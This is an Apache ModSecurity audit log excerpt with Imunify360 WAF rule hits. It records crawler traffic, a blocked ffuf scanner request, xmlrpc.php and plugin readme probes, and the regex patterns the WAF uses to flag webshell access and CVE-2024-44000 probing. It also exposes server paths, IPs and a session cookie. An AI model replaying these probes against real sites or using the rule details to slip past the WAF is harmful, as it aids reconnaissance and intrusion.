HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --b8fa854c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b8fa854c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751283903318023 1970328 (- - -) Stopwatch2: 1751283903318023 1970328; combined=3353, p1=113, p2=3088, p3=0, p4=0, p5=152, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b8fa854c-Z-- --029adf45-A-- [30/Jun/2025:17:15:06.791214 +0530] aGJ4wdoXULVP1MP-O9SamAAAABs 103.185.74.40 30465 192.168.74.40 443 --029adf45-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --029adf45-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --029adf45-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751283905497777 1293684 (- - -) Stopwatch2: 1751283905497777 1293684; combined=2134, p1=88, p2=1890, p3=0, p4=0, p5=156, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --029adf45-Z-- --b15d2217-A-- [30/Jun/2025:17:15:09.338155 +0530] aGJ4xXSMlpA25H3D5i_xaQAAAAc 57.141.0.10 47674 192.168.74.40 443 --b15d2217-B-- GET /rajasthan-tours-from-Delhi/rajasthan-tours-from-jodhpur/rajasthan-tours-from-delhi/rajasthan-tours-from-delhi/rajasthan-tours-from-jaipur/Rajasthan-Travel-Guides/images/testimonials/rajasthan-tours-from-ahmedabad/shipping.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --b15d2217-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b15d2217-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --788c4653-Z-- --6eab6a46-A-- [30/Jun/2025:17:26:09.563468 +0530] aGJ7WfloTDMmBQkEBah8gAAAABA 43.165.189.206 33146 192.168.74.40 80 --6eab6a46-B-- GET / HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --6eab6a46-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --6eab6a46-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751284569556808 6974 (- - -) Stopwatch2: 1751284569556808 6974; combined=4049, p1=100, p2=3728, p3=89, p4=2, p5=130, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6eab6a46-Z-- --ef1c9260-A-- [30/Jun/2025:17:26:11.893006 +0530] aGJ7Wzfx-NT2h58atWKymgAAADs 13.74.177.36 8250 192.168.74.40 80 --ef1c9260-B-- GET /xmlrpc.php HTTP/1.1 Host: wiretronicindia.com --ef1c9260-F-- HTTP/1.1 404 Not Found Content-Length: 315 Content-Type: text/html; charset=iso-8859-1 --ef1c9260-H-- Message: String match "xmlrpc.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "166"] [id "77141064"] [msg "IM360 WAF: CMS Recon Bot detected||MVN:REQUEST_FILENAME||RSV:7.05||RS:0||T:APACHE||MV:/xmlrpc.php||RM:GET||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751284571885848 7206 (- - -) Stopwatch2: 1751284571885848 7206; combined=4445, p1=111, p2=4137, p3=89, p4=2, p5=105, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d020c471-Z-- --85442170-A-- [30/Jun/2025:17:45:12.799426 +0530] aGJ_zzFfkq5jzVmPtS2JYAAAAC0 185.126.81.110 60528 192.168.74.40 443 --85442170-B-- GET / HTTP/1.1 Host: 103.185.74.40 User-Agent: Fuzz Faster U Fool v2.1.0-dev Accept-Encoding: gzip --85442170-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --85442170-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "23"] [id "77210801"] [msg "IM360 WAF: Request Indicates a Security Scanner Scanned the Site||MV:Fuzz Faster U Fool v2.1.0-dev||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751285711886430 913086 (- - -) Stopwatch2: 1751285711886430 913086; combined=3920, p1=115, p2=3606, p3=0, p4=0, p5=198, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --85442170-Z-- --61249614-A-- [30/Jun/2025:17:45:13.108980 +0530] aGJ_0eBhWXSkRVAiPA2k7QAAAAo 20.171.207.232 58466 192.168.74.40 443 --61249614-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-jodhpur/aainag/https/rajasthan-destinations.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --61249614-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --61249614-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-jodhpur/aainag/https/rajasthan-destinations.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-jodhpur/aainag/https/rajasthan-destinations.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/https/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751285713057553 51484 (- - -) Stopwatch2: 1751285713057553 51484; combined=3250, p1=130, p2=2999, p3=0, p4=0, p5=121, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751286287867165 13724 (- - -) Stopwatch2: 1751286287867165 13724; combined=2691, p1=126, p2=2417, p3=0, p4=0, p5=148, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --85edbc04-Z-- --0211d735-A-- [30/Jun/2025:17:54:48.495399 +0530] aGKCEGC9nWX22sQcnyASIQAAAAw 103.185.74.40 57279 192.168.74.40 80 --0211d735-B-- GET /server-status?auto HTTP/1.1 User-Agent: Zabbix 6.4.19 Host: 103.185.74.40 Accept: */* Accept-Encoding: deflate, gzip --0211d735-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html --0211d735-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:GET||Perf all:combined=100, p1=100, p2=0, p3=0, p4=0, p5=0, sr=0, sw=0, l=0, gc=0||Py scan:||Lua scan:||RBL:||RSV:7.05||RS:403||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Error: [file "mod_access_compat.c"] [line 353] [level 3] AH01797: client denied by server configuration: /var/www/html/server-status Apache-Handler: default-handler Stopwatch: 1751286288493045 2436 (- - -) Stopwatch2: 1751286288493045 2436; combined=301, p1=100, p2=0, p3=0, p4=0, p5=201, sr=0, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0211d735-Z-- --da2aaf2f-A-- [30/Jun/2025:17:54:49.047444 +0530] aGKCEV6tVqfgFHsytjnjRwAAABU 20.171.207.232 58550 192.168.74.40 443 --da2aaf2f-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-jodhpur/aainag/js/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --da2aaf2f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --da2aaf2f-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-jodhpur/aainag/js/privacy-policy.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-jodhpur/aainag/js/privacy-policy.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/https/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751286289033950 13564 (- - -) Stopwatch2: 1751286289033950 13564; combined=2971, p1=113, p2=2729, p3=0, p4=0, p5=128, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751287515374834 16688 (- - -) Stopwatch2: 1751287515374834 16688; combined=3288, p1=205, p2=2932, p3=0, p4=0, p5=151, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a15a675a-Z-- --11201f5b-A-- [30/Jun/2025:18:15:15.786219 +0530] aGKG2vy6sFD6VYPnzdBtEgAAADo 103.185.74.40 28606 192.168.74.40 443 --11201f5b-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --11201f5b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --11201f5b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751287514516293 1270444 (- - -) Stopwatch2: 1751287514516293 1270444; combined=2656, p1=86, p2=2404, p3=0, p4=0, p5=165, sr=49, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --11201f5b-Z-- --d5278978-A-- [30/Jun/2025:18:15:16.582355 +0530] aGKG3DxiIg4eTvHnHDY_PQAAAA4 20.171.207.232 59246 192.168.74.40 443 --d5278978-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-jodhpur/https/js/images/payment-mode.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --d5278978-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --d5278978-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751287520228018 10382 (- - -) Stopwatch2: 1751287520228018 10382; combined=6312, p1=134, p2=5794, p3=190, p4=4, p5=189, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2299ee69-Z-- --f0b1980d-A-- [30/Jun/2025:18:15:20.612229 +0530] aGKG2_20RS0_FcVVhuGXlgAAAAY 103.185.74.40 9666 192.168.74.40 443 --f0b1980d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --f0b1980d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f0b1980d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751287515998273 4614608 (- - -) Stopwatch2: 1751287515998273 4614608; combined=3732, p1=214, p2=3298, p3=0, p4=0, p5=220, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f0b1980d-Z-- --af506f59-A-- [30/Jun/2025:18:15:21.265288 +0530] aGKG4TxiIg4eTvHnHDY_QQAAAA4 20.171.207.232 59246 192.168.74.40 443 --af506f59-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-jodhpur/https/js/images/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --af506f59-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --af506f59-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6cf1cc43-Z-- --a1fb9b48-A-- [30/Jun/2025:18:49:47.199388 +0530] aGKO8xipZgxxI7e1HiAwRAAAAGc 67.205.152.1 59354 192.168.74.40 80 --a1fb9b48-B-- GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --a1fb9b48-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --a1fb9b48-H-- Message: Pattern match "(wlwmanifest\\.xml|readme\\.txt|changelog\\.(md|txt)|lang_upload\\.php|arm_widgets_js\\.js|__\\sUPDATES.txt|wpuef-configurator.js)" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "1820"] [id "77350190"] [msg "IM360 WAF: WordPress plugins/themes version enumeration||RSV:7.05||RS:0||T:APACHE||REQUEST_URI:/wp-content/plugins/litespeed-cache/readme.txt||"] [severity "NOTICE"] [tag "wp_core"] [tag "noshow"] Message: String match "readme.txt" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "1827"] [id "77350589"] [msg "IM360 WAF: WordPress plugins/themes version enumeration using readme.txt||MV:/wp-content/plugins/litespeed-cache/readme.txt||User:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "wp_core"] [tag "noshow"] Message: String match "/wp-content/plugins/litespeed-cache/readme.txt" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "2221"] [id "77350639"] [msg "IM360 WAF: Suspicious access attempt to WordPress debug.log (CVE-2024-44000)||MV:/wp-content/plugins/litespeed-cache/readme.txt||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "wp_core"] Apache-Handler: default-handler Stopwatch: 1751289587189567 10227 (- - -) Stopwatch2: 1751289587189567 10227; combined=5229, p1=125, p2=4952, p3=0, p4=0, p5=152, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a1fb9b48-Z-- --bfe56a55-A-- [30/Jun/2025:18:49:49.206176 +0530] aGKO9Edop-Fnku7mMXz9OgAAACU 67.205.152.1 58720 192.168.74.40 80 --bfe56a55-B-- GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1 Host: novemsol.com User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --bfe56a55-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://novemsol.com/wp-json/>; rel="https://api.w.org/" Set-Cookie: PHPSESSID=4f5204324008b8262f8fb12cb56d20cc; path=/ Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --331fde13-Z-- --153e933d-A-- [30/Jun/2025:18:55:01.806875 +0530] aGKQLUze9ZS5Sepg3lsyLgAAAF8 43.157.149.188 33622 192.168.74.40 80 --153e933d-B-- GET / HTTP/1.1 Host: 103.185.74.40:80 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --153e933d-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --153e933d-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751289901795386 11982 (- - -) Stopwatch2: 1751289901795386 11982; combined=6491, p1=142, p2=5969, p3=185, p4=3, p5=191, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --153e933d-Z-- --b4ab491c-A-- [30/Jun/2025:18:55:02.743306 +0530] aGKQLvm8TUQuUKyjW7kwtwAAAFo 57.141.0.26 60186 192.168.74.40 443 --b4ab491c-B-- GET /rajasthan-tours-from-ahmedabad/rajasthan-tours-from-agra/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/rajasthan-tours-from-jaipur/rajasthan-tours-from-udaipur/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/rajasthan-tours-from-jodhpur/images/rajasthan-tours-from-ahmedabad/index.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --b4ab491c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b4ab491c-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-agra/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/rajasthan-tours-from-jaipur/rajasthan-tours-from-udaipur/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/rajasthan-tours-from-jodhpur/images/rajasthan-tours-from-ahmedabad/index.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751291135717459 43924 (- - -) Stopwatch2: 1751291135717459 43924; combined=16346, p1=182, p2=15430, p3=324, p4=8, p5=401, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1e7f3a3d-Z-- --05d4ca51-A-- [30/Jun/2025:19:15:39.052970 +0530] aGKVAU2IbV2Kf1hwDId9awAAACE 103.185.74.40 61692 192.168.74.40 443 --05d4ca51-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --05d4ca51-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --05d4ca51-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against 